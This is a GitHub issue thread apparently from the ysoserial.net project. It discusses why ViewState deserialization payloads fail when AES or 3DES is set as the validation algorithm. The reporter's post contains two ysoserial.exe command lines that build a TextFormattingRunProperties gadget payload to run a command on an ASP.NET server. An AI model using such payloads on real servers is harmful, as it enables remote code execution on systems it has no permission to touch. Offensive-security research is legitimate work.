The problem of deserializing AES\3DES in Viewstate #122
Comments
|
I am not sure whether I have understood what you are going to achieve here. The validation algorithm should use a hashing algorithm rather than an encryption one. Therefore AES/3DES cannot be used for this purpose. |
|
@irsdl they're mentioned in MS documentation as validation algorithms here: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831711(v=ws.11) |
|
Thanks, I will have a look. It sounds like you are right. I need to see how it's been implemented to get them in here. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hello!
Viewstate, generate a payload encrypted as AES and 3DES, and the test cannot be deserialized. The query data is (if the signature algorithm is aes/3des, no matter whether the encryption function is enabled or not, we just need to sign the data first, encrypt it again, and then sign it again as mentioned earlier. Then send it to the server, asp.net enters getdecodeddata(), and then encryptordecryptdata() first for verification and decryption, and then verify it again after coming out.), How to solve this problem? There are also lower versions of V2 Net2.0viewstate deserialization how should I use the chain?
Attempted code
ysoserial. exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/hello.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="xxxxxxxxxx" --validationalg="AES" --validationkey="xxxxxxxxxx"
ysoserial. exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/hello.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="xxxxxxxxxx" --validationalg="3DES" --validationkey="xxxxxxxxxx"
The text was updated successfully, but these errors were encountered: